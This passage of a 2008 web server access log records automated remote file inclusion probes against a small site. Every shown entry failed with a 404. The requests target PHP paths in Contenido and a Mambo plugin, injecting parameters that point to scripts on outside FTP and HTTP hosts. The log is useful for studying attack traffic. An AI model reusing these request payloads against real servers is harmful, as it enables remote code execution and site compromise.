69.93.48.162 - - [15/Jun/2008:19:24:56 -0700] "GET /logs/access.log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:24:56 -0700] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:24:56 -0700] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:24:58 -0700] "GET /logs/access.log//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:24:58 -0700] "GET //contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
69.93.48.162 - - [15/Jun/2008:19:24:58 -0700] "GET /logs//contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:25:00 -0700] "GET /logs/access_071231.log//index.php?dir=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:25:00 -0700] "GET //index.php?dir=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
64.27.83.240 - - [15/Jun/2008:19:25:00 -0700] "GET /logs//index.php?dir=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:25:00 -0700] "GET /logs/access.log//contenido/backend_search.php?contenido_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:25:00 -0700] "GET //contenido/backend_search.php?contenido_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.102.242.34 - - [15/Jun/2008:19:25:01 -0700] "GET /logs//contenido/backend_search.php?contenido_path=http://www.tripiwarez.eu/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
207.44.132.63 - - [15/Jun/2008:19:25:16 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
207.44.132.63 - - [15/Jun/2008:19:25:20 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "summitcircle.com"
207.44.132.63 - - [15/Jun/2008:19:26:27 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "summitcircle.com"
207.44.132.63 - - [15/Jun/2008:19:26:27 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "summitcircle.com"
74.53.137.18 - - [15/Jun/2008:19:26:29 -0700] "GET /logs/access_071231.log//inc/header.php/step_one.php?server_inc=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.137.18 - - [15/Jun/2008:19:26:29 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "summitcircle.com"
74.53.137.18 - - [15/Jun/2008:19:26:41 -0700] "GET /logs/access_080127.log//inc/header.php/step_one.php?server_inc=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
74.53.137.18 - - [15/Jun/2008:19:26:41 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.beschriftungsworld.de/anzeigen/anzeige/1197717838?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.44.132.63 - - [15/Jun/2008:19:27:52 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "summitcircle.com"
207.44.132.63 - - [15/Jun/2008:19:27:53 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://metromini.freetzi.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows;